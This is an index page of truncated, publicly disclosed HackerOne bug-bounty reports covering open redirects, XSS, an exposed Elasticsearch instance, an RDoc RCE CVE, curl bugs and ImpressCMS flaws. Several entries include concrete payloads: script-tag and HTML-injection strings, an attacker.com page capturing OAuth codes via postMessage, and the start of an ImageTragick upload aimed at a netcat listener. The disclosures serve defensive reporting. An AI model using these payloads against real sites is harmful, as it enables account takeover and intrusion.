HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 1041 - 1060
We were able to bypass the mechanism that prevents open redirects due to incomplete URL input validation. I have reported it below and written a patch to fix it. https://hackerone.com/reports/1789458 ## Impact Vulnerable code will look like this: ```ruby redirect_to(params[:some_param]) ``` Rails 7.0 introduced protection against open redirects from calling …
Hello Team, I got a security issue in reverb ios application which allows an attacker hack all users account. Since iOS application is not in the scope but still I am reporting this, because this vulnerability may compromise all users account. Please resolve this quickly. Desription: Reverb ios application is …
Domain, site, application --- oauth.semrush.com Steps to reproduce --- 1) Create following html at attacker.com/postmessage.html ``` <script> function listener(event) { alert(JSON.stringify(event.data)); } var dest = window.open("https://oauth.semrush.com/oauth2/authorize?response_type=code&scope=user.info,projects.info,siteaudit.info&client_id=seoquake&redirect_uri=https%3A%2F%2Foauth.semrush.com%2Foauth2%2Fsuccess&state=636e7bae-22ed-407d-8d62-1d49b49ec962"); window.addEventListener("message", listener); </script> ``` 2) Go to attacker.com/postmessage.html (make sure you are logged in at www.semrush.com) 3) Click "Approve" 4) Go to tab with …
**Description:** The vulnerability lies in insecure access to an Elasticsearch instance accessible at the URL "https://███████l". Currently, access to Elasticsearch is open without the need for authentication, exposing data stored on this instance to the risk of unauthorized disclosure. ## References https://www.acunetix.com/vulnerabilities/web/elasticsearch-service-accessible/ https://medium.com/@D0rkerDevil/3k-bounty-for-elastic-search-takeover-70c0847d2e40 https://infosecwriteups.com/haystack-hackthebox-writeup-7dfd8a6fed5 https://book.hacktricks.xyz/network-services-pentesting/9200-pentesting-elasticsearch ## Impact Insecure access to …
#Introduction In the Zomato Business app there is the functionality to report a review and give additional details as to why you did report the review. Because I knew this reason would be read by Zomato admins I did insert a blind XSS payload here, which ended up executing on …
CVE-2024-27281: RCE vulnerability with .rdoc_options in RDoc
High
$4,860
Closed
I made a report at https://hackerone.com/reports/1187477 https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/ > An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. > When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no …
**Summary:** Stored XSS exists at https://www.██████.mil. A user can fill out the form and upload a file containing javascript code to trigger XSS. **Description:** Stored XSS exists at https://www.████.mil. A user can fill out the form and upload a file containing javascript code to trigger XSS. ## Impact A user …
**Issue descriptions** We found that the maximum length of the first and last name fields was not set to 32 characters at registration and to 1000 characters when using the profile update form. The attacker can use this method as a malware attack, the user will redirect to a website …
Hi, ### Background kitcrm.com allows the administrator to upload priority product images located at: https://kitcrm.com/seller/onboarding/1 {F359446} {F359447} These images are not being checked if they are real JPG/PNG/GIF. When uploading an ImageTragick (issue found my Tavis Ormandy) using the following payload (my netcat listener is on `██████████:8080`: ``` %!PS userdict …
You can post javascript code in form fields ## Summary [add summary of the vulnerability] ## Steps To Reproduce [add details for how we can reproduce the issue] steps : 1-go to vulnerability link : https://www.acronis.cz/dotaznik/roadshow-2020/ 2- enter this javascript code "><script>alert(1);</script> in form field 1. [add step] 1. [add …
hello dear I have found HTML injection on ██████.informatica.com parameters injectable search.html?q=1 URL : https://████████.informatica.com/search.html?q=1%22%3E%3Cimg%20src=https://www.no-gods-no-masters.com/images_designs/anonymous-gandhi-d001001207265.png%3E%E2%80%[email protected]%20%22 payload ; 1"><img src=https://www.no-gods-no-masters.com/images_designs/anonymous-gandhi-d001001207265.png>”@x.y " https://█████.informatica.com/search.html?q=1%3Ca%20href=%22//bf.am%22%3EWelcome%3C/a%3E payload : <a href="//bf.am">Welcome</a> ## Impact Phising Abusing other user Defacing
I'm Zehui Miao from NISL@THU. During recent research, our team identified a parsing inconsistency in the curl. ### **0x01 Affected components** #### **1.1 Affected components** • **C Curl** • **Versions:** tested in 8.4.0 • **CLAIMS TO FOLLOW: RFC-3986** #### **1.2 Attack scenario** The threat model illustrated in Figure 1 explains …
## Summary: When curl command is used with `--continue-at`, the `--no-clobber` is unexpectedly ignored and curl will append the output to the target file, even if it already exists. If `--continue-at` is used with`--remove-on-error` it can lead to unexpected removal of the file on early errors. Note that this also …
## Summary: The vulnerability is located in the `/include/findusers.php` script: ``` 16. include "../mainfile.php"; 17. xoops_header(false); 18. 19. $denied = true; 20. if (!empty($_REQUEST['token'])) { 21. if (icms::$security->validateToken($_REQUEST['token'], false)) { 22. $denied = false; 23. } 24. } elseif (is_object(icms::$user) && icms::$user->isAdmin()) { 25. $denied = false; 26. } 27. …
## Summary: The vulnerability is located in the `/libraries/image-editor/image-edit.php` script: ``` 161. if (@copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $simage->getVar ( 'image_name' ) )) { 162. if (@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp )) { 163. $msg = _MD_AM_DBUPDATED; [...] 190. } else { 191. if …
This bug was reported directly to GitHub Security Lab.
Hi Team, **Summary:** There is newly disclosed resolved report [Program Email Nofication settings ignored when being added as an external contributor](https://hackerone.com/reports/645264), However i found that the fix is incomplete. I have found that email invitation for a collaborator (bounty splitting) still disclosing the __Report title__ in email when the notification …